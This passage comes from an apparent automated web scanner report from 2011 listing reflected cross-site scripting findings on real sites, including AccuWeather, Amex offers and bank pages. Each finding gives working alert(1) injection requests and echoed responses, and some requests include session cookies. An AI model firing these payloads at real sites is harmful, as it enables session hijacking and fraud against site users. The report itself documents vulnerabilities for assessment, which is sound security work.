Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n8), ms jfk-agg-n8 ( origin>CONN)
Cache-Control: max-age=2760
Expires: Thu, 03 Feb 2011 17:05:31 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
"] = mimeType;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self4df0b";alert(1)//aada13118d6&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self4df0b";ale
...[SNIP]...

4.410. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [theme parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the theme request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e337d"%3balert(1)//a1ece0aaeff was submitted in the theme parameter. This input was echoed as e337d";alert(1)//a1ece0aaeff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=cloudse337d"%3balert(1)//a1ece0aaeff&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:18:53 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n4), ms jfk-agg-n4 ( origin>CONN)
Cache-Control: max-age=3180
Expires: Thu, 03 Feb 2011 17:11:53 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
) ret.embedAttrs["type"] = mimeType;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=cloudse337d";alert(1)//a1ece0aaeff&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=cloudse337d";ale
...[SNIP]...

4.411. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [zipcode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the zipcode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8162"%3balert(1)//ba94b6bb5ca was submitted in the zipcode parameter. This input was echoed as c8162";alert(1)//ba94b6bb5ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025c8162"%3balert(1)//ba94b6bb5ca&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:17:32 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n34), ms jfk-agg-n34 ( origin>CONN)
Cache-Control: max-age=2820
Expires: Thu, 03 Feb 2011 17:04:32 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
uginsPage;
if (mimeType) ret.embedAttrs["type"] = mimeType;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025c8162";alert(1)//ba94b6bb5ca&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025c8162";ale
...[SNIP]...

4.412. http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ocresort.ocregister.com
Path:   /2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5ef3"><script>alert(1)</script>3b1abce3997 was submitted in the REST URL parameter 5. This input was echoed as b5ef3\"><script>alert(1)</script>3b1abce3997 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810b5ef3"><script>alert(1)</script>3b1abce3997/ HTTP/1.1
Host: ocresort.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:15:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://ocresort.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:15:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
alternate" type="application/rss+xml" title=" Page not found - Around Disney - www.ocregister.com" href="http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810b5ef3\"><script>alert(1)</script>3b1abce3997/feed/" />
...[SNIP]...

4.413. http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ocresort.ocregister.com
Path:   /2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f4a3"><script>alert(1)</script>ebc82fd6548 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8f4a3\"><script>alert(1)</script>ebc82fd6548 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/?8f4a3"><script>alert(1)</script>ebc82fd6548=1 HTTP/1.1
Host: ocresort.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:15:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://ocresort.ocregister.com/xmlrpc.php
Link: <http://ocresort.ocregister.com/?p=68810>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78618


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
" title=" Disney parks renovate 9 attractions, other areas - Around Disney - www.ocregister.com" href="http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/?8f4a3\"><script>alert(1)</script>ebc82fd6548=1feed/" />
...[SNIP]...

4.414. http://offers.amexnetwork.com/portalext/inline/back_support_mock_ie.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://offers.amexnetwork.com
Path:   /portalext/inline/back_support_mock_ie.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 457ed'-alert(1)-'43bbf2ba26d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /portalext/inline/back_support_mock_ie.jsp?457ed'-alert(1)-'43bbf2ba26d=1 HTTP/1.1
Host: offers.amexnetwork.com
Proxy-Connection: keep-alive
Referer: http://offers.amexnetwork.com/selects/us/grid?categoryPath=/amexnetwork/category/Shoppinga21a4%22%3E%3Cscript%3Ealert(1)%3C/script%3E9146dd0abe&issuerName=us_prop&inav=menu_rewards_shopping
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Surrogate-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: Thu, 03 Feb 2011 15:39:08 GMT
Date: Thu, 03 Feb 2011 15:39:08 GMT
Connection: close
Content-Length: 125

<script>
function getLocation() {
return '457ed'-alert(1)-'43bbf2ba26d=1';
}

parent.reloadHashSemaphore=false;
</script>

4.415. http://offers.amexnetwork.com/selects/us/grid [categoryPath parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://offers.amexnetwork.com
Path:   /selects/us/grid

Issue detail

The value of the categoryPath request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a21a4"><script>alert(1)</script>9146dd0abe was submitted in the categoryPath parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /selects/us/grid?categoryPath=/amexnetwork/category/Shoppinga21a4"><script>alert(1)</script>9146dd0abe&issuerName=us_prop&inav=menu_rewards_shopping HTTP/1.1
Host: offers.amexnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Cache-Control: no-cache
Expires: Thu, 03 Feb 2011 14:22:55 GMT
Date: Thu, 03 Feb 2011 14:22:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 215250


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
   
   
                   
...[SNIP]...
10='';s.eVar10='';s.prop20='';s.eVar20='';
                                       switchSubCategory(this);

switchGrid('/PCOfferGridController/searchOffers.do?localLocale=en-us&categoryPath_last=/amexnetwork/category/Shoppinga21a4"><script>alert(1)</script>9146dd0abe&localCountryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&pocsort=2&countryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&issuerName=us_prop&categoryPath=/amexnetwork/category/Travel/Air');

return switc
...[SNIP]...

4.416. http://offers.amexnetwork.com/selects/us/grid [issuerName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://offers.amexnetwork.com
Path:   /selects/us/grid

Issue detail

The value of the issuerName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13a13"><script>alert(1)</script>8d46a60ecb1 was submitted in the issuerName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop13a13"><script>alert(1)</script>8d46a60ecb1&inav=menu_rewards_shopping HTTP/1.1
Host: offers.amexnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Cache-Control: no-cache
Expires: Thu, 03 Feb 2011 14:27:34 GMT
Date: Thu, 03 Feb 2011 14:27:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 291329


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
   
   
                   
...[SNIP]...
<a href="/selects/us?issuerName=us_prop13a13"><script>alert(1)</script>8d46a60ecb1">
...[SNIP]...

4.417. http://offers.amexnetwork.com/selects/us/grid [issuerName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://offers.amexnetwork.com
Path:   /selects/us/grid

Issue detail

The value of the issuerName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82cc0"%3balert(1)//5ac35aa2ed1 was submitted in the issuerName parameter. This input was echoed as 82cc0";alert(1)//5ac35aa2ed1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop82cc0"%3balert(1)//5ac35aa2ed1&inav=menu_rewards_shopping HTTP/1.1
Host: offers.amexnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Cache-Control: no-cache
Expires: Thu, 03 Feb 2011 14:28:36 GMT
Date: Thu, 03 Feb 2011 14:28:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 287293


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
   
   
                   
...[SNIP]...
.do?localLocale=en-us&categoryPath=/amexnetwork/category/Shopping&localCountryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&pocsort=2&countryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&issuerName=us_prop82cc0";alert(1)//5ac35aa2ed1&popup=true&offerId=<offerId>
...[SNIP]...

4.418. http://offers.amexnetwork.com/selects/us/grid [issuerName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://offers.amexnetwork.com
Path:   /selects/us/grid

Issue detail

The value of the issuerName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bae6e'%3balert(1)//ad3a1fe5923 was submitted in the issuerName parameter. This input was echoed as bae6e';alert(1)//ad3a1fe5923 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_propbae6e'%3balert(1)//ad3a1fe5923&inav=menu_rewards_shopping HTTP/1.1
Host: offers.amexnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Cache-Control: no-cache
Expires: Thu, 03 Feb 2011 14:29:41 GMT
Date: Thu, 03 Feb 2011 14:29:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 287293


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
   
   
                   
...[SNIP]...
.do?localLocale=en-us&categoryPath=/amexnetwork/category/Shopping&localCountryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&pocsort=2&countryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&issuerName=us_propbae6e';alert(1)//ad3a1fe5923',
    {
               method:'GET',
               onComplete:parseXml
           });
}
function parseXml(response)
{
var responseXml = response.responseXML;
//alert(responseXml);
var m
...[SNIP]...

4.419. http://onlinecheckingsbanking.com/ [adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinecheckingsbanking.com
Path:   /

Issue detail

The value of the adid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4a7"><script>alert(1)</script>c726bd08fb8 was submitted in the adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?keyword=online%20banking&adid=3b4a7"><script>alert(1)</script>c726bd08fb8 HTTP/1.1
Host: onlinecheckingsbanking.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:43:46 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=947b717b071dadc68ba7dd3e56fcdf06; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 721
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<frame src="http://getcheckingaccountonline.com/?keyword=online%20banking&adid=3b4a7"><script>alert(1)</script>c726bd08fb8" "frameborder=0"/>
...[SNIP]...

4.420. http://onlinecheckingsbanking.com/ [keyword parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinecheckingsbanking.com
Path:   /

Issue detail

The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8916"><script>alert(1)</script>2d8d0fb1f0b was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?keyword=b8916"><script>alert(1)</script>2d8d0fb1f0b&adid=289819058 HTTP/1.1
Host: onlinecheckingsbanking.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:43:45 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=d460c720f7cd5ee81d00c4a5c9da894f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 714
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<frame src="http://getcheckingaccountonline.com/?keyword=b8916"><script>alert(1)</script>2d8d0fb1f0b&adid=289819058" "frameborder=0"/>
...[SNIP]...

4.421. http://onlinecheckingsbanking.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinecheckingsbanking.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b820e"><script>alert(1)</script>6f57152ba82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?keyword=online%20banking&adid=289819058&b820e"><script>alert(1)</script>6f57152ba82=1 HTTP/1.1
Host: onlinecheckingsbanking.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:43:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=cf6aa261be55b78f06bd6404dc8b066c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 733
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<frame src="http://getcheckingaccountonline.com/?keyword=online%20banking&adid=289819058&b820e"><script>alert(1)</script>6f57152ba82=1" "frameborder=0"/>
...[SNIP]...

4.422. http://peoplesbank.com/search.php [term parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://peoplesbank.com
Path:   /search.php

Issue detail

The value of the term request parameter is copied into the HTML document as plain text between tags. The payload 9183b<script>alert(1)</script>6fd4fa2c65b was submitted in the term parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search.php?d=peoplesbank.com&cachekey=1296747318&rc=true&term=Internet+banking9183b<script>alert(1)</script>6fd4fa2c65b&append= HTTP/1.1
Host: peoplesbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=n94u5lhrbr0a5c7as50gdp2tc0;

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
P3P: CP="NOI COR NID ADMa DEVa PSAa PSDa STP NAV DEM STA PRE"
Cache-Control: no-cache
Content-type: text/html
Connection: close
Date: Thu, 03 Feb 2011 15:41:42 GMT
Server: lighttpd
Content-Length: 18861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="au
...[SNIP]...
<span class="searchedfor">INTERNET BANKING9183B<SCRIPT>ALERT(1)</SCRIPT>6FD4FA2C65B</span>
...[SNIP]...

4.423. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 346ad'%3balert(1)//f0a82ea655a was submitted in the admeld_callback parameter. This input was echoed as 346ad';alert(1)//f0a82ea655a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld_sync?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match346ad'%3balert(1)//f0a82ea655a HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_atf?t=1296754761812&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid=eyIyIjogWyI0NzYwNDkyOTk5MjEzODAxNzMzIiwgNzM0MTcwXSwgIjQiOiBbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsIDczNDE1MV19; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8171\": [0+ 0+ 1296660699+ 2+ 1296659838+ 2]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]+ \"9376\": [0+ 0+ 1296659628+ 1+ 1296659628+ 1]}"; impressions="{\"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]+ \"351309\": [1296660699+ \"6b326db0-ad1f-378f-98c3-837da14b6503\"+ 139089+ 81343+ 191]+ \"456235\": [1296659628+ \"85680993-10ca-3909-9c72-ac737305e927\"+ 139089+ 81343+ 191]}"; frequency="{\"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]+ \"351309\": [1296660759+ 1+ 1296660699+ 2+ 1296659838+ 2]+ \"456235\": [1296659688+ 1+ 1296659628+ 1+ 1296659628+ 1]}"; subID="{}"; dp_rec="{\"1\": 1296659838+ \"3\": 1296659629+ \"2\": 1296508071+ \"4\": 1296660699}"; partnerUID="eyI4NCI6IFsiRFRRa2U3VDk5OVk0cVlKQiIsIHRydWVdfQ=="; segments="3391|13746|3392|23864|11262|11265|30353|7775|17277|3425|38781|38582,1298044270|27273|40657|24085|10102"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 03 Feb 2011 19:02:42 GMT
